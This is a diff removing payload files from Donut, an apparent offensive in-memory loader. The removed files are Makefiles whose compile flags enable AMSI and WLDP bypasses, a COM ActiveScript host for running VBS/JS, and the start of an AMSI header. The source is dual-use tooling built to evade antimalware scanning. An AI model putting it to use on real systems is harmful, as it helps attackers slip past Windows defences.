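+++ b/payload/Makefile.mingw
@@ -1,12 +0,0 @@
-x64:
-x86_64-w64-mingw32-gcc -DBYPASS_AMSI_A -DBYPASS_WLDP_A -fno-toplevel-reorder -fpack-struct=8 -fPIC -O0 -nostdlib payload.c clib.c ../hash.c ../encrypt.c -I ../include -opayload.exe
-exe2h/exe2h payload.exe
-x86:
-i686-w64-mingw32-gcc -DBYPASS_AMSI_A -DBYPASS_WLDP_A -fno-toplevel-reorder -fpack-struct=8 -fPIC -O0 -nostdlib payload.c clib.c ../hash.c ../encrypt.c -I ../include -opayload.exe
-exe2h/exe2h payload.exe
-debug_x64:
-x86_64-w64-mingw32-gcc -DCLIB -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Wno-format -fpack-struct=8 -DDEBUG -I ../include payload.c ../hash.c ../encrypt.c clib.c -opayload.exe
-debug_x86:
-i686-w64-mingw32-gcc -DCLIB -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Wno-format -fpack-struct=8 -DDEBUG -I ../include payload.c ../hash.c ../encrypt.c clib.c -opayload.exe
-clean:
-rm *.o payload.exe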
+0
-9
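--- a/payload/Makefile.msvc
+++ b/payload/Makefile.msvc
@@ -1,9 +0,0 @@
-payload:
-cl -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Zp8 -c -nologo -Gy -Os -O1 -GR- -EHa -Oi -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c clib.c
-link -nologo -order:@order.txt -entry:ThreadProc -fixed -subsystem:console -nodefaultlib payload.obj hash.obj encrypt.obj clib.obj
-exe2h\exe2h payload.exe
-debug:
-cl -DDEBUG -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Zp8 -c -nologo -Gy -Os -EHa -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c clib.c
-link -nologo -order:@order.txt -subsystem:console payload.obj hash.obj encrypt.obj clib.obj
-clean:
-del *.obj payload.exe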
+0
-186
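--- a/payload/activescript.c
+++ b/payload/activescript.c
@@ -1,186 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-// initialize virtual function table
-static VOID ActiveScript_New(PDONUT_INSTANCE inst, IActiveScriptSite *this) {
-MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
-
-// Initialize IUnknown
-mas->site.lpVtbl->QueryInterface = ADR(LPVOID, ActiveScript_QueryInterface);
-mas->site.lpVtbl->AddRef = ADR(LPVOID, ActiveScript_AddRef);
-mas->site.lpVtbl->Release = ADR(LPVOID, ActiveScript_Release);
-
-// Initialize IActiveScriptSite
-mas->site.lpVtbl->GetLCID = ADR(LPVOID, ActiveScript_GetLCID);
-mas->site.lpVtbl->GetItemInfo = ADR(LPVOID, ActiveScript_GetItemInfo);
-mas->site.lpVtbl->GetDocVersionString = ADR(LPVOID, ActiveScript_GetDocVersionString);
-mas->site.lpVtbl->OnScriptTerminate = ADR(LPVOID, ActiveScript_OnScriptTerminate);
-mas->site.lpVtbl->OnStateChange = ADR(LPVOID, ActiveScript_OnStateChange);
-mas->site.lpVtbl->OnScriptError = ADR(LPVOID, ActiveScript_OnScriptError);
-mas->site.lpVtbl->OnEnterScript = ADR(LPVOID, ActiveScript_OnEnterScript);
-mas->site.lpVtbl->OnLeaveScript = ADR(LPVOID, ActiveScript_OnLeaveScript);
-
-mas->site.m_cRef = 0;
-mas->inst = inst;
-}
-
-static STDMETHODIMP ActiveScript_QueryInterface(IActiveScriptSite *this, REFIID riid, void **ppv) {
-MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
-
-DPRINT("IActiveScriptSite::QueryInterface");
-
-if(ppv == NULL) return E_POINTER;
-
-// we implement the following interfaces
-if(IsEqualIID(&mas->inst->xIID_IUnknown, riid) ||
-IsEqualIID(&mas->inst->xIID_IActiveScriptSite, riid))
-{
-*ppv = (LPVOID)this;
-ActiveScript_AddRef(this);
-return S_OK;
-}
-*ppv = NULL;
-return E_NOINTERFACE;
-}
-
-static STDMETHODIMP_(ULONG) ActiveScript_AddRef(IActiveScriptSite *this) {
-MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
-
-_InterlockedIncrement(&mas->site.m_cRef);
-
-DPRINT("IActiveScriptSite::AddRef : m_cRef : %i\n", mas->site.m_cRef);
-
-return mas->site.m_cRef;
-}
-
-static STDMETHODIMP_(ULONG) ActiveScript_Release(IActiveScriptSite *this) {
-MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
-
-ULONG ulRefCount = _InterlockedDecrement(&mas->site.m_cRef);
-
-DPRINT("IActiveScriptSite::Release : m_cRef : %i\n", ulRefCount);
-return ulRefCount;
-}
-
-static STDMETHODIMP ActiveScript_GetItemInfo(IActiveScriptSite *this,
-LPCOLESTR objectName, DWORD dwReturnMask,
-IUnknown **objPtr, ITypeInfo **ppti)
-{
-MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
-
-DPRINT("IActiveScriptSite::GetItemInfo");
-
-if(dwReturnMask & SCRIPTINFO_ITYPEINFO) {
-DPRINT("Caller is requesting SCRIPTINFO_ITYPEINFO.");
-if(ppti == NULL) return E_POINTER;
-
-mas->wscript.lpTypeInfo->lpVtbl->AddRef(mas->wscript.lpTypeInfo);
-*ppti = mas->wscript.lpTypeInfo;
-}
-
-if(dwReturnMask & SCRIPTINFO_IUNKNOWN) {
-DPRINT("Caller is requesting SCRIPTINFO_IUNKNOWN.");
-if(objPtr == NULL) return E_POINTER;
-
-mas->wscript.lpVtbl->AddRef(&mas->wscript);
-*objPtr = (IUnknown*)&mas->wscript;
-}
-
-return S_OK;
-}
-
-static STDMETHODIMP ActiveScript_OnScriptError(IActiveScriptSite *this,
-IActiveScriptError *scriptError)
-{
-DPRINT("IActiveScriptSite::OnScriptError");
-
-EXCEPINFO ei;
-DWORD dwSourceContext = 0;
-ULONG ulLineNumber = 0;
-LONG ichCharPosition = 0;
-HRESULT hr;
-
-Memset(&ei, 0, sizeof(EXCEPINFO));
-
-DPRINT("IActiveScriptError::GetExceptionInfo");
-hr = scriptError->lpVtbl->GetExceptionInfo(scriptError, &ei);
-if(hr == S_OK) {
-DPRINT("IActiveScriptError::GetSourcePosition");
-hr = scriptError->lpVtbl->GetSourcePosition(
-scriptError, &dwSourceContext,
-&ulLineNumber, &ichCharPosition);
-if(hr == S_OK) {
-DPRINT("JSError: %ws line[%d:%d]\n",
-ei.bstrDescription, ulLineNumber, ichCharPosition);
-}
-}
-return S_OK;
-}
-
-static STDMETHODIMP ActiveScript_GetLCID(IActiveScriptSite *this, LCID *plcid) {
-DPRINT("IActiveScriptSite::GetLCID");
-MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
-
-*plcid = mas->inst->api.GetUserDefaultLCID();
-return S_OK;
-}
-
-static STDMETHODIMP ActiveScript_GetDocVersionString(IActiveScriptSite *this, BSTR *version) {
-DPRINT("IActiveScriptSite::GetDocVersionString");
-
-return S_OK;
-}
-
-static STDMETHODIMP ActiveScript_OnScriptTerminate(IActiveScriptSite *this,
-const VARIANT *pvr, const EXCEPINFO *pei)
-{
-DPRINT("IActiveScriptSite::OnScriptTerminate");
-
-return S_OK;
-}
-
-static STDMETHODIMP ActiveScript_OnStateChange(IActiveScriptSite *this, SCRIPTSTATE state) {
-DPRINT("IActiveScriptSite::OnStateChange");
-
-return S_OK;
-}
-
-static STDMETHODIMP ActiveScript_OnEnterScript(IActiveScriptSite *this) {
-DPRINT("IActiveScriptSite::OnEnterScript");
-
-return S_OK;
-}
-
-static STDMETHODIMP ActiveScript_OnLeaveScript(IActiveScriptSite *this) {
-DPRINT("IActiveScriptSite::OnLeaveScript");
-
-return S_OK;
-}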
+0
-436
payload/activescript.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef IACTIVESCRIPT_H
32 #define IACTIVESCRIPT_H
33
34 #include "../include/donut.h"
35
36 // required to load and run VBS or JS files
37 typedef struct _IActiveScript IActiveScript;
38 typedef struct _IActiveScriptError IActiveScriptError;
39 typedef struct _IActiveScriptSite IActiveScriptSite;
40 typedef struct _IActiveScriptSiteWindow IActiveScriptSiteWindow;
41 typedef struct _IActiveScriptParse32 IActiveScriptParse32;
42 typedef struct _IActiveScriptParse64 IActiveScriptParse64;
43
44 typedef enum tagSCRIPTSTATE {
45 SCRIPTSTATE_UNINITIALIZED = 0,
46 SCRIPTSTATE_STARTED = 1,
47 SCRIPTSTATE_CONNECTED = 2,
48 SCRIPTSTATE_DISCONNECTED = 3,
49 SCRIPTSTATE_CLOSED = 4,
50 SCRIPTSTATE_INITIALIZED = 5
51 } SCRIPTSTATE;
52
53 typedef enum tagSCRIPTTHREADSTATE {
54 SCRIPTTHREADSTATE_NOTINSCRIPT = 0,
55 SCRIPTTHREADSTATE_RUNNING = 1
56 } SCRIPTTHREADSTATE;
57
58 #define SCRIPTTHREADID_CURRENT 0xFFFFFFFD // The currently executing thread.
59 #define SCRIPTTHREADID_BASE 0xFFFFFFFE // The base thread; that is, the thread in which the scripting engine was instantiated.
60 #define SCRIPTTHREADID_ALL 0xFFFFFFFF // All threads.
61
62 typedef DWORD SCRIPTTHREADID;
63
64 #define SCRIPTITEM_ISPERSISTENT 0x00000001
65 #define SCRIPTITEM_ISVISIBLE 0x00000002
66 #define SCRIPTITEM_ISSOURCE 0x00000004
67 #define SCRIPTITEM_GLOBALMEMBERS 0x00000008
68 #define SCRIPTITEM_EXISTS 0x00000080
69 #define SCRIPTITEM_MULTIINSTANCE 0x00000100
70 #define SCRIPTITEM_CODEONLY 0x00000200
71
72 #define SCRIPTTEXT_ISPERSISTENT 0x00000001
73 #define SCRIPTTEXT_ISVISIBLE 0x00000002
74 #define SCRIPTTEXT_ISEXPRESSION 0x00000020
75 #define SCRIPTTEXT_KEEPDEFINITIONS 0x00000040
76 #define SCRIPTTEXT_ALLOWEXECUTION 0x00000400
77 #define SCRIPTTEXT_ALL_FLAGS (SCRIPTTEXT_ISPERSISTENT | \
78 SCRIPTTEXT_ISVISIBLE | \
79 SCRIPTTEXT_ISEXPRESSION | \
80 SCRIPTTEXT_KEEPDEFINITIONS | \
81 SCRIPTTEXT_ALLOWEXECUTION)
82
83 #define SCRIPTTEXT_HOSTMANAGESSOURCE 0x00000080
84 #define SCRIPTINFO_IUNKNOWN 0x00000001
85 #define SCRIPTINFO_ITYPEINFO 0x00000002
86 #define SCRIPTINFO_ALL_FLAGS (SCRIPTINFO_IUNKNOWN | SCRIPTINFO_ITYPEINFO)
87
88 typedef struct IActiveScriptVtbl {
89 BEGIN_INTERFACE
90
91 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
92 IActiveScript * This,
93 /* [in] */ REFIID riid,
94 /* [annotation][iid_is][out] */
95 void **ppvObject);
96
97 ULONG ( STDMETHODCALLTYPE *AddRef )(
98 IActiveScript * This);
99
100 ULONG ( STDMETHODCALLTYPE *Release )(
101 IActiveScript * This);
102
103 HRESULT ( STDMETHODCALLTYPE *SetScriptSite )(
104 IActiveScript * This,
105 /* [in] */ IActiveScriptSite *pass);
106
107 HRESULT ( STDMETHODCALLTYPE *GetScriptSite )(
108 IActiveScript * This,
109 /* [in] */ REFIID riid,
110 /* [iid_is][out] */ void **ppvObject);
111
112 HRESULT ( STDMETHODCALLTYPE *SetScriptState )(
113 IActiveScript * This,
114 /* [in] */ SCRIPTSTATE ss);
115
116 HRESULT ( STDMETHODCALLTYPE *GetScriptState )(
117 IActiveScript * This,
118 /* [out] */ SCRIPTSTATE *pssState);
119
120 HRESULT ( STDMETHODCALLTYPE *Close )(
121 IActiveScript * This);
122
123 HRESULT ( STDMETHODCALLTYPE *AddNamedItem )(
124 IActiveScript * This,
125 /* [in] */ LPCOLESTR pstrName,
126 /* [in] */ DWORD dwFlags);
127
128 HRESULT ( STDMETHODCALLTYPE *AddTypeLib )(
129 IActiveScript * This,
130 /* [in] */ REFGUID rguidTypeLib,
131 /* [in] */ DWORD dwMajor,
132 /* [in] */ DWORD dwMinor,
133 /* [in] */ DWORD dwFlags);
134
135 HRESULT ( STDMETHODCALLTYPE *GetScriptDispatch )(
136 IActiveScript * This,
137 /* [in] */ LPCOLESTR pstrItemName,
138 /* [out] */ IDispatch **ppdisp);
139
140 HRESULT ( STDMETHODCALLTYPE *GetCurrentScriptThreadID )(
141 IActiveScript * This,
142 /* [out] */ SCRIPTTHREADID *pstidThread);
143
144 HRESULT ( STDMETHODCALLTYPE *GetScriptThreadID )(
145 IActiveScript * This,
146 /* [in] */ DWORD dwWin32ThreadId,
147 /* [out] */ SCRIPTTHREADID *pstidThread);
148
149 HRESULT ( STDMETHODCALLTYPE *GetScriptThreadState )(
150 IActiveScript * This,
151 /* [in] */ SCRIPTTHREADID stidThread,
152 /* [out] */ SCRIPTTHREADSTATE *pstsState);
153
154 HRESULT ( STDMETHODCALLTYPE *InterruptScriptThread )(
155 IActiveScript * This,
156 /* [in] */ SCRIPTTHREADID stidThread,
157 /* [in] */ const EXCEPINFO *pexcepinfo,
158 /* [in] */ DWORD dwFlags);
159
160 HRESULT ( STDMETHODCALLTYPE *Clone )(
161 IActiveScript * This,
162 /* [out] */ IActiveScript **ppscript);
163
164 END_INTERFACE
165 } IActiveScriptVtbl;
166
167 typedef struct _IActiveScript {
168 IActiveScriptVtbl *lpVtbl;
169 } ActiveScript;
170
171 typedef struct IActiveScriptParse32Vtbl {
172 BEGIN_INTERFACE
173
174 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
175 IActiveScriptParse32 * This,
176 /* [in] */ REFIID riid,
177 /* [annotation][iid_is][out] */
178 void **ppvObject);
179
180 ULONG ( STDMETHODCALLTYPE *AddRef )(
181 IActiveScriptParse32 * This);
182
183 ULONG ( STDMETHODCALLTYPE *Release )(
184 IActiveScriptParse32 * This);
185
186 HRESULT ( STDMETHODCALLTYPE *InitNew )(
187 IActiveScriptParse32 * This);
188
189 HRESULT ( STDMETHODCALLTYPE *AddScriptlet )(
190 IActiveScriptParse32 * This,
191 /* [in] */ LPCOLESTR pstrDefaultName,
192 /* [in] */ LPCOLESTR pstrCode,
193 /* [in] */ LPCOLESTR pstrItemName,
194 /* [in] */ LPCOLESTR pstrSubItemName,
195 /* [in] */ LPCOLESTR pstrEventName,
196 /* [in] */ LPCOLESTR pstrDelimiter,
197 /* [in] */ DWORD dwSourceContextCookie,
198 /* [in] */ ULONG ulStartingLineNumber,
199 /* [in] */ DWORD dwFlags,
200 /* [out] */ BSTR *pbstrName,
201 /* [out] */ EXCEPINFO *pexcepinfo);
202
203 HRESULT ( STDMETHODCALLTYPE *ParseScriptText )(
204 IActiveScriptParse32 * This,
205 /* [in] */ LPCOLESTR pstrCode,
206 /* [in] */ LPCOLESTR pstrItemName,
207 /* [in] */ IUnknown *punkContext,
208 /* [in] */ LPCOLESTR pstrDelimiter,
209 /* [in] */ DWORD dwSourceContextCookie,
210 /* [in] */ ULONG ulStartingLineNumber,
211 /* [in] */ DWORD dwFlags,
212 /* [out] */ VARIANT *pvarResult,
213 /* [out] */ EXCEPINFO *pexcepinfo);
214
215 END_INTERFACE
216 } IActiveScriptParse32Vtbl;
217
218 typedef struct _IActiveScriptParse32 {
219 IActiveScriptParse32Vtbl *lpVtbl;
220 } ActiveScriptParse32;
221
222 typedef struct IActiveScriptParse64Vtbl {
223 BEGIN_INTERFACE
224
225 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
226 IActiveScriptParse64 * This,
227 /* [in] */ REFIID riid,
228 /* [annotation][iid_is][out] */
229 void **ppvObject);
230
231 ULONG ( STDMETHODCALLTYPE *AddRef )(
232 IActiveScriptParse64 * This);
233
234 ULONG ( STDMETHODCALLTYPE *Release )(
235 IActiveScriptParse64 * This);
236
237 HRESULT ( STDMETHODCALLTYPE *InitNew )(
238 IActiveScriptParse64 * This);
239
240 HRESULT ( STDMETHODCALLTYPE *AddScriptlet )(
241 IActiveScriptParse64 *This,
242 /* [in] */ LPCOLESTR pstrDefaultName,
243 /* [in] */ LPCOLESTR pstrCode,
244 /* [in] */ LPCOLESTR pstrItemName,
245 /* [in] */ LPCOLESTR pstrSubItemName,
246 /* [in] */ LPCOLESTR pstrEventName,
247 /* [in] */ LPCOLESTR pstrDelimiter,
248 /* [in] */ DWORDLONG dwSourceContextCookie,
249 /* [in] */ ULONG ulStartingLineNumber,
250 /* [in] */ DWORD dwFlags,
251 /* [out] */ BSTR *pbstrName,
252 /* [out] */ EXCEPINFO *pexcepinfo);
253
254 HRESULT ( STDMETHODCALLTYPE *ParseScriptText )(
255 IActiveScriptParse64 *This,
256 /* [in] */ LPCOLESTR pstrCode,
257 /* [in] */ LPCOLESTR pstrItemName,
258 /* [in] */ IUnknown *punkContext,
259 /* [in] */ LPCOLESTR pstrDelimiter,
260 /* [in] */ DWORDLONG dwSourceContextCookie,
261 /* [in] */ ULONG ulStartingLineNumber,
262 /* [in] */ DWORD dwFlags,
263 /* [out] */ VARIANT *pvarResult,
264 /* [out] */ EXCEPINFO *pexcepinfo);
265
266 END_INTERFACE
267 } IActiveScriptParse64Vtbl;
268
269 typedef struct _IActiveScriptParse64 {
270 IActiveScriptParse64Vtbl *lpVtbl;
271 } ActiveScriptParse64;
272
273 typedef struct _IActiveScriptSiteWindowVtbl {
274 BEGIN_INTERFACE
275
276 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
277 IActiveScriptSiteWindow * This,
278 /* [in] */ REFIID riid,
279 /* [annotation][iid_is][out] */
280 void **ppvObject);
281
282 ULONG ( STDMETHODCALLTYPE *AddRef )(
283 IActiveScriptSiteWindow * This);
284
285 ULONG ( STDMETHODCALLTYPE *Release )(
286 IActiveScriptSiteWindow * This);
287
288 HRESULT ( STDMETHODCALLTYPE *GetWindow )(
289 IActiveScriptSiteWindow * This,
290 /* [out] */ HWND *phwnd);
291
292 HRESULT ( STDMETHODCALLTYPE *EnableModeless )(
293 IActiveScriptSiteWindow * This,
294 /* [in] */ BOOL fEnable);
295
296 END_INTERFACE
297 } IActiveScriptSiteWindowVtbl;
298
299 typedef struct _IActiveScriptSiteWindow {
300 IActiveScriptSiteWindowVtbl *lpVtbl;
301 } ActiveScriptSiteWindow;
302
303 typedef struct _IActiveScriptErrorVtbl {
304 BEGIN_INTERFACE
305
306 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
307 IActiveScriptError * This,
308 /* [in] */ REFIID riid,
309 /* [annotation][iid_is][out] */
310 void **ppvObject);
311
312 ULONG ( STDMETHODCALLTYPE *AddRef )(
313 IActiveScriptError * This);
314
315 ULONG ( STDMETHODCALLTYPE *Release )(
316 IActiveScriptError * This);
317
318 /* [local] */ HRESULT ( STDMETHODCALLTYPE *GetExceptionInfo )(
319 IActiveScriptError * This,
320 /* [out] */ EXCEPINFO *pexcepinfo);
321
322 HRESULT ( STDMETHODCALLTYPE *GetSourcePosition )(
323 IActiveScriptError * This,
324 /* [out] */ DWORD *pdwSourceContext,
325 /* [out] */ ULONG *pulLineNumber,
326 /* [out] */ LONG *plCharacterPosition);
327
328 HRESULT ( STDMETHODCALLTYPE *GetSourceLineText )(
329 IActiveScriptError * This,
330 /* [out] */ BSTR *pbstrSourceLine);
331
332 END_INTERFACE
333 } IActiveScriptErrorVtbl;
334
335 typedef struct _IActiveScriptError {
336 IActiveScriptErrorVtbl *lpVtbl;
337 } ActiveScriptError;
338
339 typedef struct _IActiveScriptSiteVtbl {
340 BEGIN_INTERFACE
341
342 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
343 IActiveScriptSite * This,
344 /* [in] */ REFIID riid,
345 /* [annotation][iid_is][out] */
346 void **ppvObject);
347
348 ULONG ( STDMETHODCALLTYPE *AddRef )(
349 IActiveScriptSite * This);
350
351 ULONG ( STDMETHODCALLTYPE *Release )(
352 IActiveScriptSite * This);
353
354 HRESULT ( STDMETHODCALLTYPE *GetLCID )(
355 IActiveScriptSite * This,
356 /* [out] */ LCID *plcid);
357
358 HRESULT ( STDMETHODCALLTYPE *GetItemInfo )(
359 IActiveScriptSite * This,
360 /* [in] */ LPCOLESTR pstrName,
361 /* [in] */ DWORD dwReturnMask,
362 /* [out] */ IUnknown **ppiunkItem,
363 /* [out] */ ITypeInfo **ppti);
364
365 HRESULT ( STDMETHODCALLTYPE *GetDocVersionString )(
366 IActiveScriptSite * This,
367 /* [out] */ BSTR *pbstrVersion);
368
369 HRESULT ( STDMETHODCALLTYPE *OnScriptTerminate )(
370 IActiveScriptSite * This,
371 /* [in] */ const VARIANT *pvarResult,
372 /* [in] */ const EXCEPINFO *pexcepinfo);
373
374 HRESULT ( STDMETHODCALLTYPE *OnStateChange )(
375 IActiveScriptSite * This,
376 /* [in] */ SCRIPTSTATE ssScriptState);
377
378 HRESULT ( STDMETHODCALLTYPE *OnScriptError )(
379 IActiveScriptSite * This,
380 /* [in] */ IActiveScriptError *pscripterror);
381
382 HRESULT ( STDMETHODCALLTYPE *OnEnterScript )(
383 IActiveScriptSite * This);
384
385 HRESULT ( STDMETHODCALLTYPE *OnLeaveScript )(
386 IActiveScriptSite * This);
387
388 END_INTERFACE
389 } IActiveScriptSiteVtbl;
390
391 typedef struct _IActiveScriptSite {
392 IActiveScriptSiteVtbl *lpVtbl;
393 ULONG m_cRef; // reference count (not part of original definition of course)
394 } ActiveScriptSite;
395
396 #ifdef _WIN64
397 #define IActiveScriptParse IActiveScriptParse64
398 #define IID_IActiveScriptParse IID_IActiveScriptParse64
399 #else
400 #define IActiveScriptParse IActiveScriptParse32
401 #define IID_IActiveScriptParse IID_IActiveScriptParse32
402 #endif
403
404 static VOID ActiveScript_New(PDONUT_INSTANCE inst, IActiveScriptSite *this);
405
406 static STDMETHODIMP ActiveScript_QueryInterface(IActiveScriptSite *this, REFIID riid, void **ppv);
407 static STDMETHODIMP_(ULONG) ActiveScript_AddRef(IActiveScriptSite *this);
408 static STDMETHODIMP_(ULONG) ActiveScript_Release(IActiveScriptSite *this);
409
410 // Informs the host that the scripting engine has begun executing the script code.
411 static STDMETHODIMP ActiveScript_OnEnterScript(IActiveScriptSite *this);
412
413 // Informs the host that the scripting engine has returned from executing script code.
414 static STDMETHODIMP ActiveScript_OnLeaveScript(IActiveScriptSite *this);
415
416 // Retrieves the locale identifier that the host uses for displaying user-interface elements.
417 static STDMETHODIMP ActiveScript_GetLCID(IActiveScriptSite *this, LCID *lcid);
418
419 // Retrieves a host-defined string that uniquely identifies the current document version from the host's point of view.
420 static STDMETHODIMP ActiveScript_GetDocVersionString(IActiveScriptSite *this, BSTR *version);
421
422 // Informs the host that an execution error occurred while the engine was running the script.
423 static STDMETHODIMP ActiveScript_OnScriptError(IActiveScriptSite *this, IActiveScriptError *scriptError);
424
425 // Informs the host that the scripting engine has changed states.
426 static STDMETHODIMP ActiveScript_OnStateChange(IActiveScriptSite *this, SCRIPTSTATE state);
427
428 // Obtains information about an item that was added to an engine through a call to the IActiveScript::AddNamedItem method.
429 static STDMETHODIMP ActiveScript_GetItemInfo(IActiveScriptSite *this, LPCOLESTR objectName, DWORD dwReturnMask, IUnknown **objPtr, ITypeInfo **typeInfo);
430
431 // Called when the script has completed execution.
432 static STDMETHODIMP ActiveScript_OnScriptTerminate(IActiveScriptSite *this, const VARIANT *pvr, const EXCEPINFO *pei);
433
434 #endif
435
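--- a/payload/amsi.h
+++ b/payload/amsi.h
@@ -1,182 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-#ifndef AMSI_H
-#define AMSI_H
-
-#include <windows.h>
-
-DECLARE_HANDLE(HAMSICONTEXT);
-DECLARE_HANDLE(HAMSISESSION);
-
-typedef struct _IAmsiStream IAmsiStream;
-typedef struct _IAntimalware IAntimalware;
-typedef struct _IAntimalwareProvider IAntimalwareProvider;
-
-typedef enum tagAMSI_RESULT {
-// No detection found. Result likely not going to change after future definition update.
-// a.k.a. known good
-AMSI_RESULT_CLEAN = 0,
-// No detection found. Result might change after future definition update.
-AMSI_RESULT_NOT_DETECTED = 1,
-// Detection found. It is recommended to abort executing the content if it is executable, e.g. a script.
-// Return result of 1 - 32767 is estimated risk level that an antimalware provider might indicate.
-// The large the result, the riskier to continue.
-// Any return result equal to or larger than 32768 is consider malware and should be blocked.
-// These values are provider specific, and may indicate malware family or ID.
-// An application should use AmsiResultIsMalware() to determine whether the content should be blocked.
-AMSI_RESULT_DETECTED = 32768,
-} AMSI_RESULT;
-
-typedef enum tagAMSI_ATTRIBUTE {
-// Name/version/GUID string of the calling application.
-AMSI_ATTRIBUTE_APP_NAME = 0,
-// LPWSTR, filename, URL, script unique id etc.
-AMSI_ATTRIBUTE_CONTENT_NAME = 1,
-// ULONGLONG, size of the input. Mandatory.
-AMSI_ATTRIBUTE_CONTENT_SIZE = 2,
-// PVOID, memory address if content is fully loaded in memory. Mandatory unless
-// Read() is implemented instead to support on-demand content retrieval.
-AMSI_ATTRIBUTE_CONTENT_ADDRESS = 3,
-// PVOID, session is used to associate different scan calls, e.g. if the contents
-// to be scanned belong to the sample original script. Return nullptr if content
-// is self-contained. Mandatory.
-AMSI_ATTRIBUTE_SESSION = 4,
-} AMSI_ATTRIBUTE;
-
-typedef struct IAmsiStreamVtbl {
-BEGIN_INTERFACE
-
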